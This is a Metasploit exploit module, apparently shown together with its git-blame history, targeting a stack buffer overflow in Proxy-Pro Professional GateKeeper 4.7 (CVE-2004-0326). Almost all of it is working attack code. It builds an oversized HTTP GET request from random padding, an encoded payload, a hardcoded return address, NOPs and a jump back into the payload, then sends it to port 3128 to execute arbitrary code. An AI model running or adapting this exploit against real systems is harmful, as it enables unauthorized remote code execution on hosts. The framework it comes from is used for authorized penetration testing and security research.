modules/exploits/windows/proxy/proxypro_http_get.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Proxy-Pro Professional
          GateKeeper 4.7. By sending a long HTTP GET to the default port
          of 3128, a remote attacker could overflow a buffer and execute
          arbitrary code.
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2004-0326'],
          ['OSVDB', '4027'],
          ['BID', '9716'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 500,
          'BadChars' => "\x00+&=%\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
        ],
        'Privileged' => true,
        'DisclosureDate' => '2004-02-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(3128)
      ]
    )
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sploit = "GET /" + rand_text_english(3603, payload_badchars)
    sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
    sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"

    sock.put(sploit)
    sock.get_once(-1, 3)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
More modules from MC 2006-09-13 06:20:05 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
More modules from MC 2006-09-13 06:20:05 +00:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',`
			`'Description' => %q{`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`This module exploits a stack buffer overflow in Proxy-Pro Professional`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`GateKeeper 4.7. By sending a long HTTP GET to the default port`
			`of 3128, a remote attacker could overflow a buffer and execute`
			`arbitrary code.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
			`'References' => [`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`['CVE', '2004-0326'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '4027'],`
More modules from MC 2006-09-13 06:20:05 +00:00			`['BID', '9716'],`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultOptions' => {`
More modules from MC 2006-09-13 06:20:05 +00:00			`'EXITFUNC' => 'process',`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 500,`
More modules from MC 2006-09-13 06:20:05 +00:00			`'BadChars' => "\x00+&=%\x0a\x0d\x20",`
			`'StackAdjustment' => -3500,`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Targets' => [`
More modules from MC 2006-09-13 06:20:05 +00:00			`[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => true,`
			`'DisclosureDate' => '2004-02-23',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
More modules from MC 2006-09-13 06:20:05 +00:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(3128)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`]`
			`)`
More modules from MC 2006-09-13 06:20:05 +00:00			`end`

			`def exploit`
			`connect`

			`print_status("Trying target #{target.name}...")`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`sploit = "GET /" + rand_text_english(3603, payload_badchars)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"`
More modules from MC 2006-09-13 06:20:05 +00:00
			`sock.put(sploit)`
			`sock.get_once(-1, 3)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
More modules from MC 2006-09-13 06:20:05 +00:00			`handler`
			`disconnect`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`